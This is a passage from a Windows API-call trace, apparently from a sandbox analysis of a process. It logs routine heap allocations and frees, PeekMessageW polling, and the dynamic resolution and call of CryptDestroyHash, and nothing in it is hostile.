HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0122.757] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0122.757] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739c8 | out: hHeap=0x2af0000) returned 1 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0122.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0122.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0122.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0122.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f6f60 [0122.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0122.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0122.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0122.760] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0122.760] CryptDestroyHash (hHash=0x9a4880) returned 1 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0122.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0122.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0122.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0122.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0122.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0122.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0122.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, 